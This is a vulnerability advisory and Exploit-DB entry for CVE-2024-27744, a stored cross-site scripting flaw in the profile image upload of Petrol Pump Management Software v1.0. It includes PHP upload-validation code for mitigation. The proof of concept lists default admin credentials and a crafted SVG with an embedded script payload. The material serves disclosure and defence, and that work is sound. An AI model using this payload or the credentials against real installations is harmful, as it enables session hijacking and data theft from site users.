Vendor: Petrol Pump Management Software
By: Shubham Pandey
CVSS: 6.1 (HIGH)
Type: Cross Site Scripting (XSS)
CWE: 79
Product Name: Petrol Pump Management Software
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CVE: CVE-2024-27744
CPE: a:petrol_pump_management_software:petrol_pump_management_software:1.0
Platforms Tested: Windows, Linux
2024

Petrol Pump Management Software v.1.0 – Stored Cross Site Scripting via SVG file

A Cross Site Scripting vulnerability was found in Petrol Pump Management Software v.1.0. This vulnerability allows an attacker to execute malicious code by uploading a specially crafted SVG file to the 'image' parameter in the profile.php component. By exploiting this vulnerability, an attacker can conduct various attacks such as stealing sensitive data, session hijacking, or defacing the website.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to ensure that uploaded files do not contain malicious scripts or code. Additionally, sanitizing user inputs and encoding special characters can help prevent XSS attacks.
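
One way to implement the upload validation described above for the 'image' field, as an added example that is not the application's own code. The function name, the 2 MiB size limit and the upload directory argument are assumptions chosen for illustration.

```php
<?php
// Added example: allowlist validation for the profile 'image' upload.
// store_profile_image(), the size limit and $uploadDir are hypothetical.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_profile_image(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    if ($file['size'] > 2 * 1024 * 1024) {   // assumed limit
        throw new RuntimeException('File too large');
    }

    // Decide the type from the file's bytes, never from the client-supplied
    // name or Content-Type. SVG is detected as an XML/SVG type, which is
    // deliberately absent from the allowlist.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = ALLOWED_IMAGE_TYPES[(string) $mime] ?? null;
    if ($ext === null) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted');
    }

    // The file must also decode as a raster image of the detected type.
    // getimagesize() returns false for SVG and other non-raster input.
    $info = getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('Not a valid image');
    }

    // Server-chosen name and extension: the uploaded name is discarded, so
    // the stored file can never end in .svg, .html or .php.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($uploadDir, '/') . '/' . $name)) {
        throw new RuntimeException('Could not store file');
    }
    return $name;
}

// Usage in the upload handler (field name 'image' as on the page):
// $stored = store_profile_image($_FILES['image'], __DIR__ . '/../assets/images');
```

Serving the upload directory with `X-Content-Type-Options: nosniff` keeps the browser from treating a stored file as anything other than the image type the server declares.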

Exploit-DB raw data:

# Exploit Title: Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file 
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27744
# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
3. Now go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the xss.svg file in "Image" field
5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page
6. The content of the xss.svg file is given below:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Shubham Pandey");
  </script>
</svg>
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md